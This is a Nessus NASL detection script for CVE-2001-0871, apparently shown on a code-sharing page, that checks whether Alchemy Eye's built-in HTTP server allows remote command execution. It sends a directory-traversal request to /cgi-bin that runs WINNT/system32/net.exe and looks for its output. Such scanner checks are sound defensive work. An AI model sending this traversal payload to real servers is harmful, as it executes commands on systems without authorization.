📄 alchemy_eye_http.nasl
字号:
## This script was written by Drew Hintz ( http://guh.nu )# # It is based on scripts written by Renaud Deraison and HD Moore## See the Nessus Scripts License for details#if(description){ script_id(10818); script_bugtraq_id(3599); script_version("$Revision: 38 $"); script_cve_id("CVE-2001-0871"); name["english"] = "Alchemy Eye HTTP Command Execution"; script_name(english:name["english"]); desc["english"] = string("Alchemy Eye and Alchemy Network Monitor are network managementtools for Microsoft Windows. The product contains a built-in HTTPserver for remote monitoring and control. This HTTP server allowsarbitrary commands to be run on the server by a remote attacker. (Taken from the security announcement by http://www.rapid7.com.)Solution : Either disable HTTP access in Alchemy Eye, or requireauthentication for Alchemy Eye. Both of these can be set in theAlchemy Eye preferences.More Information : http://www.securityfocus.com/archive/1/243404Risk factor : High"); script_description(english:desc["english"]); summary["english"] = "Determines if arbitrary commands can be executed by Alchemy Eye"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2001 H D Moore & Drew Hintz ( http://guh.nu )"); family["english"] = "CGI abuses"; script_family(english:family["english"]); script_dependencie("find_service.nes", "http_version.nasl"); script_require_keys("www/alchemy"); script_require_ports("Services/www", 80); exit(0);}include("http_func.inc");include("http_keepalive.inc");port = get_http_port(default:80);if(!get_port_state(port))exit(0);function check(req){ req = http_get(item:req, port:port); r = http_keepalive_send_recv(port:port, data:req); if ( r == NULL ) exit(0); pat = "ACCOUNTS | COMPUTER"; if(pat >< r) { security_hole(port:port); exit(0); } return(0);}dir[0] = "/PRN";dir[1] = "/NUL";dir[2] = "";for(d=0;dir[d];d=d+1){ url = string("/cgi-bin", dir[d], "/../../../../../../../../WINNT/system32/net.exe"); check(req:url);}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -